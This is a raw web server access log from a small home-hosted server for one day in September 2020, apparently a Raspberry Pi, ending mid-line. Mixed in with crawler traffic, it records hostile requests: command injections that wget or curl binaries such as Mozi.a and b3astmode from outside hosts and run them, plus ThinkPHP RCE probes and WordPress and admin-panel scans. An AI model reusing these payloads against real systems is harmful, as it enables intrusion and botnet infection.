Fri Sep 11 06:25:39 MDT 2020 06:25:39 up 22 days, 17:44, 1 user, load average: 3.90, 3.17, 2.95 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Aug20 22days 1:33m 3.74s /usr/bin/lxsession -s LXDE-pi -e LXDE 83.97.20.252 - - [11/Sep/2020:12:36:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 66.249.79.15 - - [11/Sep/2020:12:57:36 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/greenriverutah.com/residents.html HTTP/1.1" 200 7868 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 220.248.49.230 - - [11/Sep/2020:13:04:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 94.102.51.119 - - [11/Sep/2020:13:15:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 66.249.79.15 - - [11/Sep/2020:13:17:33 +0000] "GET /ac0xl/Dont-Be-Evil/Partisanship/myoshamcafee%20-%20Teams.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 162.243.128.179 - - [11/Sep/2020:13:30:12 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 34.122.56.248 - - [11/Sep/2020:13:30:42 +0000] "GET /wp-admin/admin-ajax.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" 200.94.125.243 - - [11/Sep/2020:13:39:34 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 200.94.125.243 - - [11/Sep/2020:13:39:34 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 45.160.3.130 - - [11/Sep/2020:13:47:54 +0000] "GET /ac0xl/logs/2020.07.06 HTTP/1.1" 200 273841 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" 45.160.3.130 - - [11/Sep/2020:13:47:54 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" 45.160.3.130 - - [11/Sep/2020:13:48:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.249.79.15 - - [11/Sep/2020:13:57:54 +0000] "GET /ac0xl/Dont-Be-Evil/Leadership%20Training/ML%20for%20PMs%2012%252F5%252F17.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.15 - - [11/Sep/2020:14:08:04 +0000] "GET /ac0xl/logs/2019.09.29 HTTP/1.1" 200 5736 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 34.122.56.248 - - [11/Sep/2020:14:09:54 +0000] "GET /wp-admin/admin-ajax.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" 170.83.214.48 - - [11/Sep/2020:14:12:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 5.199.139.93 - - [11/Sep/2020:14:24:22 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 0 "http://162.250.19.7:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 66.249.79.13 - - [11/Sep/2020:14:37:59 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Feeding%20WebSpam%20manual%20actions%20to%20News%20%28Design%20Doc%29.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 45.148.10.28 - - [11/Sep/2020:14:48:16 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 0 "http://162.250.19.7:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 175.143.114.67 - - [11/Sep/2020:14:56:26 +0000] "GET /ac0xl/logs/2020.05.24 HTTP/1.1" 200 26384 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Slimjet/15.1.6.0" 195.54.160.21 - - [11/Sep/2020:15:03:46 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 66.249.79.15 - - [11/Sep/2020:15:08:13 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/Green%20River%2CUT/568.pdf HTTP/1.1" 200 29026 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 102.43.189.232 - - [11/Sep/2020:15:11:30 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1" 404 0 "" "Hello, world" 102.43.189.232 - - [11/Sep/2020:15:11:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.54.160.21 - - [11/Sep/2020:15:13:29 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:39 +0000] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:39 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:40 +0000] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:41 +0000] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:41 +0000] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:41 +0000] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:15:41 +0000] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:04 +0000] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:05 +0000] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:05 +0000] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:05 +0000] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:05 +0000] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:05 +0000] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:05 +0000] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 34.122.56.248 - - [11/Sep/2020:15:16:05 +0000] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36" 66.249.79.17 - - [11/Sep/2020:15:18:05 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/law2/581.pdf HTTP/1.1" 200 27800 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 183.136.225.56 - - [11/Sep/2020:15:23:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 195.54.160.21 - - [11/Sep/2020:15:23:58 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 212.69.18.87 - - [11/Sep/2020:15:27:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 195.54.160.21 - - [11/Sep/2020:15:27:56 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 186.42.191.194 - - [11/Sep/2020:15:37:35 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 202.83.45.239 - - [11/Sep/2020:16:02:50 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world" 202.83.45.64 - - [11/Sep/2020:16:03:11 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world" 60.254.79.137 - - [11/Sep/2020:16:43:35 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://60.254.79.137:33555/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world" 66.249.79.15 - - [11/Sep/2020:16:58:45 +0000] "GET /ac0xl/Dont-Be-Evil/Partisanship/BUSINESS%20Multicultural%20capacity%20framework%20-%20Robbins%202014%20-%20rev.%204-11-17.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 174.227.16.179 - - [11/Sep/2020:17:00:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 174.227.16.179 - - [11/Sep/2020:17:00:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 174.227.16.179 - - [11/Sep/2020:17:05:06 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 174.227.16.179 - - [11/Sep/2020:17:05:06 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 193.239.147.184 - - [11/Sep/2020:17:08:37 +0000] "HEAD / HTTP/1.0" 200 0 "" "" 83.97.20.252 - - [11/Sep/2020:17:11:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 66.249.79.15 - - [11/Sep/2020:17:18:53 +0000] "GET /downloads/g2churchbooks.org/eBook%20-%20Imagine%20-%20Vol.%20II%201-23-20%20-%20Final%21%20-%20.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 88.250.189.135 - - [11/Sep/2020:17:26:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 168.119.48.254 - - [11/Sep/2020:17:34:07 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "" "Mozilla/5.0 (compatible; Crawlson/1.0; +https://www.crawlson.com/)" 195.54.160.21 - - [11/Sep/2020:17:39:20 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 174.227.16.179 - - [11/Sep/2020:17:48:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 174.227.16.179 - - [11/Sep/2020:17:48:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.249.79.13 - - [11/Sep/2020:17:48:44 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/Green%20River%2CUT/415.pdf HTTP/1.1" 200 34649 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 174.227.16.179 - - [11/Sep/2020:17:54:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 174.227.16.179 - - [11/Sep/2020:17:54:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.249.79.13 - - [11/Sep/2020:17:58:41 +0000] "GET /ac0xl/Dont-Be-Evil/Hiring%20Practices/2018%20GMS%20D%26I%20Manifesto%20-%20Driving%20Transformational%20Change%20%28internal%20only%29.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 71.6.232.9 - - [11/Sep/2020:18:02:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" 94.102.51.119 - - [11/Sep/2020:18:03:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 46.98.120.244 - - [11/Sep/2020:18:28:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 221.120.37.156 - - [11/Sep/2020:18:37:55 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 66.249.79.17 - - [11/Sep/2020:18:45:16 +0000] "GET /ac0xl/Dont-Be-Evil/Leadership%20Training/ML%20for%20PMs%2012%252F5%252F17.pdf HTTP/1.1" 200 7628101 "" "Googlebot/2.1 (+http://www.google.com/bot.html)" 66.249.79.13 - - [11/Sep/2020:18:49:25 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 139.162.119.197 - - [11/Sep/2020:18:53:26 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 66.249.79.13 - - [11/Sep/2020:18:55:28 +0000] "GET /ac0xl/Dont-Be-Evil/Hiring%20Practices/2018%20GMS%20D%26I%20Manifesto%20-%20Driving%20Transformational%20Change%20%28internal%20only%29.pdf HTTP/1.1" 200 165489 "" "Googlebot/2.1 (+http://www.google.com/bot.html)" 131.221.162.16 - - [11/Sep/2020:19:03:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 66.249.79.207 - - [11/Sep/2020:19:19:08 +0000] "GET /ac0xl/logs/2020.01.05 HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 192.241.232.115 - - [11/Sep/2020:19:45:58 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 66.249.79.207 - - [11/Sep/2020:19:49:46 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/law/344.pdf HTTP/1.1" 200 30441 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 94.102.51.119 - - [11/Sep/2020:19:59:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 186.155.16.219 - - [11/Sep/2020:20:24:06 +0000] "GET / HTTP/1.1" 400 0 "" "" 66.168.238.50 - - [11/Sep/2020:20:29:10 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.238.50 - - [11/Sep/2020:20:29:10 +0000] "GET / HTTP/1.1" 200 25000 "" "" 66.249.79.205 - - [11/Sep/2020:20:30:03 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.205 - - [11/Sep/2020:20:30:04 +0000] "GET /ac0xl/www/slackbook/vi.html HTTP/1.1" 200 7379 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 60.243.48.248 - - [11/Sep/2020:20:31:41 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 71.94.80.89 - - [11/Sep/2020:20:33:34 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:80.0) Gecko/20100101 Firefox/80.0" 71.94.80.89 - - [11/Sep/2020:20:33:34 +0000] "GET /ac0xl/logs/2020.06.19 HTTP/1.1" 200 446935 "https://www.google.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:80.0) Gecko/20100101 Firefox/80.0" 102.47.124.95 - - [11/Sep/2020:20:44:56 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1" 404 0 "" "Hello, world" 102.47.124.95 - - [11/Sep/2020:20:44:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 146.115.136.157 - - [11/Sep/2020:21:18:32 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 266240 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 146.115.136.157 - - [11/Sep/2020:21:18:33 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 190.121.176.234 - - [11/Sep/2020:21:19:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 146.115.136.157 - - [11/Sep/2020:21:20:01 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 146.115.136.157 - - [11/Sep/2020:21:20:06 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 66.249.79.205 - - [11/Sep/2020:21:20:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 40.89.147.45 - - [11/Sep/2020:21:20:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:28 +0000] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:28 +0000] "GET /administrator/help/en-GB/toc.json HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; 